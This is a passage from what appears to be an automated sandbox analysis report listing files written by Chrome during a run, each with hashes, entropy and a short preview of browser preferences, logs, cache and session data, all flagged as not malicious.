Preview:	.q.................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...SM8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\45351cc9-0dfd-46b2-a2a4-528473db92b5.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	189605
Entropy (8bit):	6.045488285632766
Encrypted:	false
SSDEEP:	3072:q8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:rjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
MD5:	3FFD73F9E5718D722FF2012F1CD49DCF
SHA1:	E23AFF0EFFDEE0DB365B5D2DB5B99B1C8835461E
SHA-256:	7C8D9EDF38CE3AD6DB57FC16D62E41686CC9BC32729D689D2C36C8C4C3FC67B1
SHA-512:	61543123BD8DF7B63552384EB9B45769867FA4107D0821D80CF2479407B97205C5A8E5DFF398B0D29E65721B9DE45F963A89361DF15421022C09ADC132175CFF
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Google\Chrome\User Data\6bbaea5c-07b7-4ad3-bdce-04c536bc21ca.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	92724
Entropy (8bit):	3.7422964082867938
Encrypted:	false
SSDEEP:	384:r9JQfn9CcldCD+N7rwvXN3AfVMHlkGcbr2hbfxwpx1Arq3my1iNzTTcOxZ7NG1Lf:h2a11yZ0csezvRJYnH+VKPdT5g
MD5:	715C48E8348BDDFECE7F32926382776E
SHA1:	7D0FA2158079758D638723A92D23F91E057213FB
SHA-256:	038D7850A7D72454118D904BAB38D0A28C3CDE061FD64893A37CFBF47BBC9F45
SHA-512:	9B0A7CEF983DCE3006D3B8B8A917D0183BC064660F87B162A7ECFB57EB91CEE66AC8397E0FEF8CCB024838B8990C6D3A64F1BDAE8EB8C39FECC8B4D483DFD280
Malicious:	false
Preview:	0j.................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...SM8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\7753f474-3514-4b35-810b-c1c59452ed93.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	197987
Entropy (8bit):	6.074203563171146
Encrypted:	false
SSDEEP:	6144:n2jwkXLsJeQBhCepsPmtaqfIlUOoSiuRG:n2dXQJeECaChox
MD5:	4C67953A65483EA41F5973B997DE7DF0
SHA1:	78DE59DB7A213A13140C2EFB8959D6AE2FDB9BEC
SHA-256:	D3CD3998C09B37F6AF738967EF55261D587B4B467369EA546BE40B6CC557B5A4
SHA-512:	E826AE2BC7067C5987D7403459F338D3937008B9EAB78B8A64C08B03E2D0CEB695C1D8CDCD14341DB3E77AB73FAE662097CEE79F0AC65339E003ACDCD127A2BA
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Google\Chrome\User Data\813ade3c-521f-4dab-b809-8e4cbbc517d6.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	189511
Entropy (8bit):	6.045222825600431
Encrypted:	false
SSDEEP:	3072:H8jwrBc0i/fQWsL1on4cQBhCeAQTgJpI1fFcbXafIB0u1GOJmA3iuRG:cjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG
MD5:	DAC43F6C68D10D4B09DFF418FCB32275
SHA1:	FA6590D2ADD97C6742FFC1C1AFE5DE10A17CE667
SHA-256:	6AE48E46599BB286D41276C1845D2179BCBDF6D8A070DE5CFEEB6F18104361A9
SHA-512:	9AE216AA60728F6D7542468D2D569F459890BFD44D6159CE9BD3C61DC03B2CE1899D2829BAF52D3A707DACFDE420BBB20C573A53A9C8E5AED4A7515B3F764260
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799404391"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Google\Chrome\User Data\9821f99d-7388-4508-b536-588faf6965ff.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	197987
Entropy (8bit):	6.074203398417346
Encrypted:	false
SSDEEP:	6144:8mjwkXLsJeQBhCepsPmtaqfIlUOoSiuRG:8mdXQJeECaChox
MD5:	6512D2F26E38DB5F659DE90FFA439FA5
SHA1:	30655ECFB3649684B46E4D809CBA175768C0A4D1
SHA-256:	1C69AA180BBD4AEB5E50D36B440C31D8B4A5B80815D99C3A95F1F548EF207A92
SHA-512:	CA7B3EF6DBB9D48658E67AD82243851B3D3874650E355511A106A00817E164C2E59E93D8C428184C8069D6F91D0B46D2F1D06B5F08A037202EE79365E7C02C02
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.638846531476059e+12,"network":1.638814133e+12,"ticks":151462001.0,"uncertainty":4024403.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	3.254162526001658
Encrypted:	false
SSDEEP:	3:FkXft0xE1n:+ftIE1n
MD5:	BD4642AD6C750A12D912B20BCB92E14D
SHA1:	C549F0F48FDD4FBC62E51AC26D7E185160CE2123
SHA-256:	4FD71FE78DFE203137C89C9FB0734358FF432F2BC83338112DC7B830F9B30F2C
SHA-512:	04410D12EF327614C3AF1251C9906BFEB2977211A7F53CBB08A8C01F9465A382CD001E51AB936A0D196D359F1DECDDAEAF5E7D1DBD49CE5F4FF91BF5C332B6CF
Malicious:	false
Preview:	sdPC....................s}.....M..2.!..%

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\28a1e05d-9c75-4640-a463-18106351aa14.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	15600
Entropy (8bit):	5.602933196240875
Encrypted:	false
SSDEEP:	384:dWItyLlVjXi1kXqKf/pUZNCgVLH2HfD8rUR6hO4xQ:yLl9i1kXqKf/pUZNCgVLH2HfgrURIOyQ
MD5:	20F77A003432CD1667516DAF0DECB69F
SHA1:	6102EFB30CAF7435097937D336B7867F4D90DFA5
SHA-256:	688A96E21C7964E664F3079BD69EE9AFC91A23894B3A6910CC81D31E6F95B424
SHA-512:	86CA69837236A1107CFEF84A7585761D8BC4D80AF4319AAB7566BEB47A665DF40D80C575ED86F88AA5810BD9DCC29A625A89677B10D174B062530CFB0CF09374
Malicious:	false
Preview:	{"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.223979564263548
Encrypted:	false
SSDEEP:	6:mBPdxxU1lL+q2PWXp+N23iKKdK9RXXTZIFUtAPdxLWz1Zmw2PdxF0LVkwOWXp+Ns:uPC1Iva5Kk7XT2FUtAP7Wz1/2Pa5f5KU
MD5:	D9423C825B7DCE6B7E69E073A372EE3E
SHA1:	22FAB73F855C788BF792AC4D8E55CD139D4528C5
SHA-256:	9BCCA9816E11493121B85760C1B495178C7B6A673DF244DAC91EF9FB37379180
SHA-512:	86F06B45DA916AFBA1D9FB6E683D700E13E17B3C8E5FC6D793F24D2CAAB4D0298EA12B28D20680F699DAEA259B0505E8DF3826F7081A6AB11BBB46C15F99226B
Malicious:	false
Preview:	2021/12/06-19:08:55.060 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/MANIFEST-000001.2021/12/06-19:08:55.062 15e8 Recovering log #3.2021/12/06-19:08:55.071 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.old (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.223979564263548
Encrypted:	false
SSDEEP:	6:mBPdxxU1lL+q2PWXp+N23iKKdK9RXXTZIFUtAPdxLWz1Zmw2PdxF0LVkwOWXp+Ns:uPC1Iva5Kk7XT2FUtAP7Wz1/2Pa5f5KU
MD5:	D9423C825B7DCE6B7E69E073A372EE3E
SHA1:	22FAB73F855C788BF792AC4D8E55CD139D4528C5
SHA-256:	9BCCA9816E11493121B85760C1B495178C7B6A673DF244DAC91EF9FB37379180
SHA-512:	86F06B45DA916AFBA1D9FB6E683D700E13E17B3C8E5FC6D793F24D2CAAB4D0298EA12B28D20680F699DAEA259B0505E8DF3826F7081A6AB11BBB46C15F99226B
Malicious:	false
Preview:	2021/12/06-19:08:55.060 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/MANIFEST-000001.2021/12/06-19:08:55.062 15e8 Recovering log #3.2021/12/06-19:08:55.071 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	318
Entropy (8bit):	5.2083080756078965
Encrypted:	false
SSDEEP:	6:mBPdxuOFL+q2PWXp+N23iKKdKyDZIFUtAPdxzAHz1Zmw2PdxIaLVkwOWXp+N23ir:uPe/va5Kk02FUtAPu1/2PL5f5KkWJ
MD5:	A66E8A20F795325E7D8112F504E1C564
SHA1:	C6B8EF5472D3EF0BA893AFDC8987ED49D1265FD2
SHA-256:	DBF4664A60C79AE428D778707261E0AB9A52634470F86DAB937D4E936CE52647
SHA-512:	E586229001BFA38468CE2307D1261B9A798D080C7F737B34A4296C8587B8B76BD73D9D19A064903A7EF84D3E4E25FAA97FD20765CCDCB950FE051C62843D668E
Malicious:	false
Preview:	2021/12/06-19:08:55.054 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/MANIFEST-000001.2021/12/06-19:08:55.055 15e8 Recovering log #3.2021/12/06-19:08:55.056 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.oldDB (copy) Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	318
Entropy (8bit):	5.2083080756078965
Encrypted:	false
SSDEEP:	6:mBPdxuOFL+q2PWXp+N23iKKdKyDZIFUtAPdxzAHz1Zmw2PdxIaLVkwOWXp+N23ir:uPe/va5Kk02FUtAPu1/2PL5f5KkWJ
MD5:	A66E8A20F795325E7D8112F504E1C564
SHA1:	C6B8EF5472D3EF0BA893AFDC8987ED49D1265FD2
SHA-256:	DBF4664A60C79AE428D778707261E0AB9A52634470F86DAB937D4E936CE52647
SHA-512:	E586229001BFA38468CE2307D1261B9A798D080C7F737B34A4296C8587B8B76BD73D9D19A064903A7EF84D3E4E25FAA97FD20765CCDCB950FE051C62843D668E
Malicious:	false
Preview:	2021/12/06-19:08:55.054 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/MANIFEST-000001.2021/12/06-19:08:55.055 15e8 Recovering log #3.2021/12/06-19:08:55.056 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.03612967664614773
Encrypted:	false
SSDEEP:	6:/F8KzrlMNGCLrYsEfp1Bc+pHwgP2HPl3MtK:dJkXPIfp1q+pHwA2HPdEK
MD5:	BE9C7C433FD4BD20316DA43341C308C4
SHA1:	7FD89294A816F6EABB30F996671439DEAE5FAA53
SHA-256:	8871EFFA1CF97DC431C54831576BB3C9405FB7F55D34A9F765F1C80B5BD9F253
SHA-512:	0B94039FB37575E2D5297ECB4FA66AFE73682F3888BBEC52E77777E3033D106A616BC8046D3A122BE0C83BDEC78E8F5568D7DD2400EDF72A8EB9D122E35A3B9F
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.03174662860793439
Encrypted:	false
SSDEEP:	12:U/MmXAindOUAVFU/BlWlHzYGiAZY/oZ6gD09iAHCjsnU6jKjWrUAVFeBtWfWu5CE:JmwiA76YYwD0rCjiU6eq9eBk+uZO
MD5:	29CFA7919D0C395B463DA2A3534326F0
SHA1:	486F96A01BFF53090D25A5A51EEBEAFEDE1EB0F5
SHA-256:	571CEE20E0A82D6D055C9D9E0C62AEA4C89079D4A6C3FBBBA23E74B794811793
SHA-512:	8D36B7490A311C164246D08CD25DF355A845ADEC02363F5145F129F1A161ACD818384C006C42952F4DCE4F9F6B61D88CAC94C2E75B210C28926207C8CE64D322
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	1056768
Entropy (8bit):	0.10968350876104054
Encrypted:	false
SSDEEP:	96:r/+fN0y59zTjvExVbT1jkwbtQXc6/+fN0y59zTjvExVbT1jkwbtQXc:iflvELJZbtMchflvELJZbtMc
MD5:	5E8A0FF44C9A437A134533072FF122E4
SHA1:	A3DA2046219F68B7C72E554C0520C887307D0FCC
SHA-256:	E532EFBADA16111FA002E3D69A456D346374063741244304A5BAC562A63EB33B
SHA-512:	CF38D3E0FE5A2D96C07CD3949089C04140A41B62F39581B903A2FF03EEBD05830DC5688521584635DD526E45C51F2693B96D9D06E18BB968B6F2A6A211F8810E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	4202496
Entropy (8bit):	0.0419784165852963
Encrypted:	false
SSDEEP:	192:0AikP/L/4bFCI1fMR5JhFFFJZbtMVehvit61JZbtMKU:lL/dR5bFFjJtGehzJtRU
MD5:	88F90C8912A06881729C41A541819F1D
SHA1:	7FFBDCAA3F57AC1A7028CE8444C31DA5EB29E7C0
SHA-256:	25FD15A87F3FB3B31C9DDD219DD87DCB23E675F58040DBDBCB0F61B8C3CDCA87
SHA-512:	CFB2F1ADDF5CF8FB69BD2214D2FBDAB2251B1D53922D0356A2D4FB32F7A267EF91AC2A37EC6F3B38C7652C8A16D1F083922BCF88328C441D974A15610496E830
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5154898084991041
Encrypted:	false
SSDEEP:	24:TLyqJLbXaFpEO5bNmISHn06UwcQPx5fB:TekLLOpEO5J/Kn7U1uB
MD5:	861034A57F72A428F833D9A8C57FDB6C
SHA1:	FE4DE8A11179326A9123EE17DE6A7D05B1068EBB
SHA-256:	CD7D1643DE768BAC3214CDBCF0F5FB08C0FA9F4D81E3EF431CF98569E4165494
SHA-512:	036613279BCD2D8C54EA21C80BA93DCC4D3D23E835D2FD390690011F2679DADEDE3DECAA219D1749348DB859B6D211E325E5483740984BFBBA2A590E8BCA962C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	5482
Entropy (8bit):	2.9703518002147495
Encrypted:	false
SSDEEP:	48:34p6xx//9917LoubIykxQumzoP7o9LU8hIGiV5hSPFkqfdXg9On2DPwiV59/O:34mxqyIrm8Do9Ri9wdqwipO
MD5:	9FD08E874DEA6845F3D76244735F86C9
SHA1:	68B6AC5F1767E134DF4014BA8C2547506E4D25C2
SHA-256:	2A83D7C2575EEDC064774B60DF94DC5C42236EA2F21E5FC2056F31C620CA0D59
SHA-512:	13C7A27DE7A045147FDDA599EFD17608B188D3AEB2B15F12048829F89092FC82812457A02881F69F1B8F4B0E302F7CDBB1C0421A341FC0F84B9DD02A71E0C314
Malicious:	false
Preview:	SNSS....................................................!.............................................1..,.......$...1293eea3_790b_46cf_8155_cb4a6f58db13......................r.......................................................................................................................................................................chrome://newtab/....N.e.w. .T.a.b...................................................h.......`.......................................................[.F.....\.F.............................................X...(...c.h.r.o.m.e.-.s.e.a.r.c.h.:././.l.o.c.a.l.-.n.t.p./.l.o.c.a.l.-.n.t.p...h.t.m.l.................................8.......0.......8....................................................................... ............................... ...............................h.......`.......................................................].F.....^.F.....................................................a.b.o.u.t.:.b.l.a.n.k...................H... ...<.!.-

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	1.8112781244591325
Encrypted:	false
SSDEEP:	3:3Dtn:3h
MD5:	0686D6159557E1162D04C44240103333
SHA1:	053E9DB58E20A67D1E158E407094359BF61D0639
SHA-256:	3303D5EED881951B0BB52CF1C6BFA758770034D0120C197F9F7A3520B92A86FB
SHA-512:	884C0D3594390E2FC0AEAB05460F0783815170C4B57DB749B8AD9CD10741A5604B7A0F979465C4171AD9C14ED56359A4508B4DE58E794550599AAA261120976C
Malicious:	false
Preview:	SNSS....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	209
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
MD5:	478D49D9CCB25AC14589F834EA70FB9E
SHA1:	5D30E87D66E279F8815AFFE4C691AAF1D577A21E
SHA-256:	BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
SHA-512:	FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.215192451506192
Encrypted:	false
SSDEEP:	6:mBPLL+q2PWXp+N23iKKdK8aPrqIFUtAPLAXZmw2PL3VkwOWXp+N23iKKdK8amLJ:uPLL+va5KkL3FUtAPLM/2PL3V5f5KkQJ
MD5:	6B7452B3B276A6655A97C872AD26F22D
SHA1:	AD94E19C0BD9DEF2D279733C0DF3C3E7B3FF2D77
SHA-256:	EAE991041C4D0F1FE08E971BEA4C68D2C89F7F42DD1F0F3DFA4DE136FCE38963
